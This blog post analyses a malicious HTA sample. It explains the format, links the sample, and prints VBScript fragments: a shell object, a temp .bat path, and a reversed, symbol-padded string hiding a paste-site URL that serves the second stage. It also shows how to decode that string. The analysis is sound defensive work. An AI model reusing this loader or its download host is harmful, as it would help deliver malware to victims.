Analysis Malicious HTA

By

 


Another file used by attackers in cyberspace is a file known as HTA or HTML application extension. s is a Windows program that uses HTML, Dynamic HTML, and scripting languages such as VBScript or JScript to create a user interface and program logic. It runs with full trust, meaning it has more access to system resources than a typical web page. This makes them potentially useful for creating standalone applications but also a target for malicious actors. The HTA file is mostly used to download the second stage of the malware, and attackers and malware developers use PowerShell code in the HTA as well as in macros.

The HTA code structure is as follows:

<html>
<head> 
<HTA:APPLICATION 
ID="cleanApp" 
APPLICATIONNAME="MyApp" 
BORDER="thin" 
CAPTION="yes" 
SHOWINTASKBAR="yes" 
SINGLEINSTANCE="yes" 
WINDOWSTATE="normal" 
<script language="VBScript"> 
' Your safe VBScript logic here (optional) 
</script> 
<script language="JavaScript"> 
// Your safe JavaScript logic here (optional) 
</script>
</head>
</html>

As you can see, even VBA scripts can be used in the structure.

Malware Sample : https://bazaar.abuse.ch/sample/83a02fa534ab80c2661d7ab12802abc716a7325d396ff2e8b701a45721b2b854/

Real Malicious HTA Code :



 Malicious HTA Code Analysis :

<script language="VBScript">
        Dim Goshen
        Set Goshen = CreateObject("WScript.Shell")
        
        Dim doglegged
        doglegged = "C:\Windows\Temp\assonantal.bat"
  1. Malware Developer declared Goshen as  variable to interact with shell .
  2. Malware Developer declared doglegged as variable that maybe used for execute assonantal.bat .
  3. Malware Developer used Reverse String mechanism and some symbolic to obfuscate the actual destination that a second stage of the malicious file download from it . :  Replace(StrReverse(""0@/@7@9@4@w@F@j@m@W@/@d@/@e@e@.@e@t@s@a@p@/@/@:@p@t@t@h@""), ""@"", """"
Deobfuscate Reverse String & Symbolic Obfuscations :

  1. Copy the Obfuscated codes line .
  2. Paste in CyberChef . 
  3. Select Find / Replace Operations .
  4. In Find Textbox type @ .
  5. Left Replace Empty .
  6. Select Reverse Operations .
  7. You get the actual destination :) . 
POC :






Comments

Post a Comment